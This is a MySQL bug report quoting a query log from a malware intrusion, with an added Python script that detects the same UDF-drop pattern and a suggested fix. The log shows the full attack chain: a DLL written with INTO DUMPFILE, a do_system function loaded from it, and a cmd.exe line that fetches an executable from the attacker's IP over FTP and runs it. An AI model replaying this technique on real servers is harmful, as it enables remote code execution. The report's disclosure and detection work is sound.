Description:
A virus logged in to the MySQL server using the root account and multiplied itself across the development box.
Here's the log of what happened:
070715 15:58:06 5 Connect root@87.248.189.178 on mysql
070715 15:58:17 5 Query DROP TABLE IF EXISTS clown
5 Query CREATE TABLE clown (line BLOB)
070715 15:58:21 5 Query INSERT INTO clown (line) VALUES(0x4D5A9000 --cut--)
5 Query SELECT * FROM clown INTO DUMPFILE 'c:/clown.dll'
070715 15:58:22 5 Query SELECT * FROM clown INTO DUMPFILE 'c:/windows/system32/clown.dll'
070715 15:58:23 5 Query SELECT * FROM clown INTO DUMPFILE 'c:/winnt/system32/clown.dll'
070715 15:58:25 5 Query SELECT * FROM clown INTO DUMPFILE 'e:/windows/system32/clown.dll'
070715 15:58:26 5 Query SELECT * FROM clown INTO DUMPFILE 'e:/winnt/system32/clown.dll'
5 Query SELECT * FROM clown INTO DUMPFILE 'c:/clown.dll'
070715 15:58:28 5 Query SELECT * FROM clown INTO DUMPFILE 'f:/winnt/system32/clown.dll'
070715 15:58:30 5 Query SELECT * FROM clown INTO DUMPFILE 'g:/windows/system32/clown.dll'
5 Query SELECT * FROM clown INTO DUMPFILE 'g:/winnt/system32/clown.dll'
070715 15:58:31 5 Query SELECT * FROM clown INTO DUMPFILE 'h:/windows/system32/clown.dll'
070715 15:58:32 5 Query SELECT * FROM clown INTO DUMPFILE 'h:/winnt/system32/clown.dll'
5 Query CREATE FUNCTION do_system RETURNS integer SONAME 'clown.dll'
070715 15:58:33 5 Query SELECT do_system("cmd.exe /c echo open 87.248.189.178 26751 > o&echo user 1 1 >> o &echo get soundvol32.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &soundvol32.exe")
070715 15:58:34 5 Query DROP TABLE IF EXISTS clown
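The following Python script is an added example (not part of the bug report) that parses general-query-log lines in the format shown above and raises an alert when one session writes a file with INTO DUMPFILE/OUTFILE and then loads a library of the same basename with CREATE FUNCTION ... SONAME. The embedded sample log is a constructed, shortened copy of the one above (payload cut, shell command omitted) with a benign second session added.

```python
import re
from collections import defaultdict

# Constructed sample modelled on the general query log quoted above: the INSERT
# payload is shortened, the shell command omitted, and a benign session added.
SAMPLE_LOG = """\
070715 15:58:06 5 Connect root@87.248.189.178 on mysql
070715 15:58:17 5 Query CREATE TABLE clown (line BLOB)
070715 15:58:21 5 Query INSERT INTO clown (line) VALUES(0x4D5A9000)
5 Query SELECT * FROM clown INTO DUMPFILE 'c:/clown.dll'
070715 15:58:22 5 Query SELECT * FROM clown INTO DUMPFILE 'c:/windows/system32/clown.dll'
5 Query CREATE FUNCTION do_system RETURNS integer SONAME 'clown.dll'
070715 15:58:34 5 Query DROP TABLE IF EXISTS clown
070715 16:02:10 6 Connect app@localhost on shop
070715 16:02:11 6 Query SELECT id FROM orders WHERE paid = 0
"""

# The "YYMMDD HH:MM:SS" prefix is printed only when the second changes.
LINE_RE = re.compile(r"^(?:(\d{6} \d{1,2}:\d{2}:\d{2})\s+)?(\d+)\s+(\w+)\s*(.*)$")
FILE_RE = re.compile(r"INTO\s+(?:DUMP|OUT)FILE\s+'([^']+)'", re.I)
SONAME_RE = re.compile(r"CREATE\s+FUNCTION\s+(\w+)\s+RETURNS\s+\w+\s+SONAME\s+'([^']+)'", re.I)

def parse_general_log(text):
    """Yield (timestamp, thread_id, command, argument); untimed lines inherit the last timestamp."""
    last_ts = None
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            ts, tid, cmd, arg = m.groups()
            last_ts = ts or last_ts
            yield last_ts, int(tid), cmd, arg

def find_udf_drops(text):
    """Alert when a session writes a file with DUMPFILE/OUTFILE and then loads a library of that name with SONAME."""
    written = defaultdict(lambda: defaultdict(list))  # tid -> basename -> paths written
    connected = {}                                    # tid -> "user@host on db"
    alerts = []
    for ts, tid, cmd, arg in parse_general_log(text):
        if cmd == "Connect":
            connected[tid] = arg
            continue
        f = FILE_RE.search(arg)
        if f:
            base = f.group(1).replace("\\", "/").rsplit("/", 1)[-1].lower()
            written[tid][base].append(f.group(1))
        s = SONAME_RE.search(arg)
        if s and s.group(2).lower() in written[tid]:
            alerts.append({"time": ts, "thread": tid, "session": connected.get(tid),
                           "function": s.group(1), "library": s.group(2),
                           "written_to": list(written[tid][s.group(2).lower()])})
    return alerts
```

A real general log separates its fields with tabs rather than spaces; the regex accepts any whitespace so it works on both.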
How to repeat:
Some info on how this virus manifests externally can be found in Bug#29694. This might be a duplicate of Bug#28341 and a reminder that it should be fixed...
Suggested fix:
We should only load UDFs from our own directory and never allow writes to that directory from inside MySQL.